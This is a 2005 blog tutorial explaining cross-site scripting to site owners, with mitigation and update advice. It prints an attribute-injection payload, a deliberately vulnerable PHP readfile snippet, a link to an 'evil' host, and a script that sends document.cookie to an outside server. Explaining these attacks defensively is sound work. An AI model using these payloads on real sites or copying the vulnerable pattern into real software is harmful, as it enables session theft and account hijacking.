The Hungry Hacker's Explanation of Everything

Home » Security

Cross-Site Scripting 101

10 December 2005 No Comment

Cross-Site Scripting, or XSS for short, is a method used to compromise user access of a third party website in one manner or another. The actual result of the attack – ranging from session theft (you don’t log out, and the evildoer returns to the site using your credentials) to elaborate automated account hijacking – is unimportant for the purposes of this discussion. What’s important is the understanding that any small vulnerability (in either browser or web service) can easily be escalated into a full-scale, automated, “change your password and empty your paypal account” attack with the right time and devotion from the attacker.

XSS is by no means a new attack, and has been explained often before. It has not (to my knowledge) however been explained in a method which makes the average WordPress or phpBB2 user motivated to keep the software they use up to date.

It’s important to note that while javascript is the most commonly used language, it’s not the only one. VBscript, as well as other technologies such as ActiveX, Java and Flash can all be used for malicious purposes in one way or another.

Your average XSS attack involves three phases: find an attack vector; write script for said vector; and write a script for the end result. The attack vectors vary widely, because any time arbitrary javascript can be executed by a third party’s web browser after being injected by a malicious user, the service is vulnerable.

In the simplest form, an example could be a forum where the user can specify a URL for an image to be posted next to or under their name (commonly called “avatars”). If the forum software doesn’t adequately validate the form input and simply includes whatever is in the box in HTML output to other users, there’s an issue. This situation is common, but most decent forum packages will validate a URL passed to it. But for the sake of argument:

http://some.site.xyz/image.jpeg

becomes, when output:

<img src="http://some.site.xyz/image.jpeg" />

Thus, if we are malicious users:

http://some.site.xyz/image.jpeg" onload="alert('agh!');

becomes, when output:

<img src="http://some.site.xyz/image.jpeg" onload="alert('agh!');" />

When the output page is loaded in a javascript-enabled browser, a script alert dialog should appear. While not overly malicious, this simple test (which you will find on most security announcements regarding XSS vulnerabilities) simply illustrates the fact that unintended javascript is running on the website.

Of course, if you have a simple CGI “guestbook” script, one can simply include <script> tags in their guestbook entry if the entries aren’t properly validated.

In another example, some PHP programmers have been known to use the following:

<?PHP if ($_GET['page']) {
printf("<html><title>My Site</title>\n");
printf("<body>\n"); printf("<lh1>My Site</h1>\n");
readfile($_GET['page']);
printf("</body>\n");
printf("</html>\n");
} ?>

Now, assuming there is no other validation of the $_GET['url'], and the PHP setting “allow_url_fopen” is enabled (which it is, by default), then one can pass a remote URL to a page containing malicious javascript, and send the resulting url to a victim:

http://some.site.abc/showpage.php?page_url=http%3A%2F%2Fsome.evil.site.xyz%2Fpage.html

These two methods differ, because one is permanent and has the potential to net many users, and the other isn’t. The first method is commonly called “script injection”, because the page(s) is altered semi-permanently. The more recent example, visiting any other page on the website will not put you at risk of exposure.

A third example could be via logs and error messages. XSS vulnerabilities are found all the time in web-based software, as any time something that is passed from the user’s browser and is then redirected back to an HTML page it must be validated. In one scenario: if a malicious user can pass an invalid username and password to a website via the GET method, and the invalid username appears on the website without being validated, they can then craft an XSS attack inside the bounds of this text and pass the URL on to other users. This scenario depends on a certain level of user ignorance, however as people shouldn’t click on un-trusted login URLs.

In another example, if a user’s access of a website is logged, and then the logs are generated to HTML, then certain things such as the User Agent must be validated prior to being output – otherwise when the site administrator (or anyone else with logging access) views the log, their sessions are at risk.

“I’m confused, why is this an issue?”

The issue is that the potentially malicious script is executed by the browser without the current website’s permission or knowledge. Worse still: it’s more often than not run in the security context of the current website, meaning it has access to cookies, forms and such and can manipulate them.

For a display of the destructive power of XSS when used maliciously, look into the havoc it wreaked on the popular site “myspace.com”, or some other (slightly less destructive) uses.

Which leads us right into our next section, discussing the malicious javascript. If you’re feeling brave, and maintain your own website that uses cookies in any manner, feel free to append the following to one of your pages:

<script type="text/javascript"> document.location='http://www.hungryhacker.com/downloads/test.cgi?' + document.cookie; </script>

Don’t worry about the fact that you have access to edit your page and an attacker wouldn’t – I aim to prove by the end of this article that preventing XSS is quite difficult. The method used to get the script onto a popular website is irrelevant at this point. As we will discuss later in the mitigation section, the wily black-hat hacker is always coming up with new ways to inject unwanted scripts.

The script above will hopefully redirect the viewing browser to a script on my server, appending the current document’s cookie to the end of the URL. Because it’s for example purposes, all this particular script does is print back the cookie’s contents in plain text. However, it should be painfully obvious that the cookie could be logged, or whatever the attacker feels like doing with it.

Taking the attack a step further, when armed with a session cookie on many popular web applications, you can then steal that user’s session providing they don’t “log out” in the meantime. Mitigating this is tough – I make it a whole lot harder by tying a user’s session to his or her IP address for my webapps, but this breaks support for things like WebTV and some AOL users. Not to mention it still doesn’t stop the problems if the malicious user goes crazy with javascript and makes an automated script which changes your password and email address. It should be strongly noted that this scenario isn’t far-fetched.

Generally speaking the best idea is to disallow the insertion of arbitrary HTML or scripts in your site. This involves more than simply blacklisting <script> tags – one must be careful of attributes for all manner of tags (such as the <img> tag example above). A far better idea is to whitelist tags and their attributes, or if you are using something such as BBcode (from phpBB2 et al), carefully validating the URLs which are passed.

For non HTML, validate, validate, validate. Any time any text is taken from one user and sent to a web browser of any kind, one must ensure there are no HTML entities inside it which can cause us grief.

A popularly used quote from one Jon Postel is often reworded as “Be conservative in what you send, be liberal in what you accept” when it comes to software programming. I much prefer however, to adapt it to “be liberal in what you expect, be conservative in what you accept” – especially when it comes to user-passed data. I wholeheartedly recommend strong validation on any form of user input.

“But I’m not a developer!” I hear you cry. Since I began writing this article for non-programmer types, I managed to get a little off track, so I’ll attempt to bring us back. If you’re just an end user of some package or another on your website, you aren’t out of the woods yet. Your site can still be vulnerable to XSS and other methods, and part of my motivation in writing this article is that the average WordPress or MovableType user doesn’t take it anywhere near seriously enough. Don’t even get me started on phpBB2 users, either.

The first thing you need to do is find out if the particular packages or scripts you’re using have security announcement lists, and then subscribe to them if they’re available. If not, make it a habit to check the developer’s website for updates and security news – at the most, weekly – and apply updates as they become available. I believe the WordPress package includes security announcements in the administration page.

The next thing you need to do is take these announcements seriously. Generally speaking, for the average low-profile software user it’s not so important that you need to run home early from work just to patch your software. However, leaving it for any more than a week is just bad practice, try to aim for 48 hours.

The bottom line is, XSS and other subversive means aren’t going away. Thanks to some web browsers’ rendering of absolutely mangled HTML, there are an ever-increasing number of ways to sneak script onto dynamic webpages. About all you can do is arm yourself with information, and stay vigilant in your software updates.

Leave your response!

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.

You can use these tags:
<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>

This is a Gravatar-enabled weblog. To get your own globally-recognized-avatar, please register at Gravatar. Note: By filling out this comment form or emailing us you are signifying that you have read and agree to the terms laid out on the Contact Us page.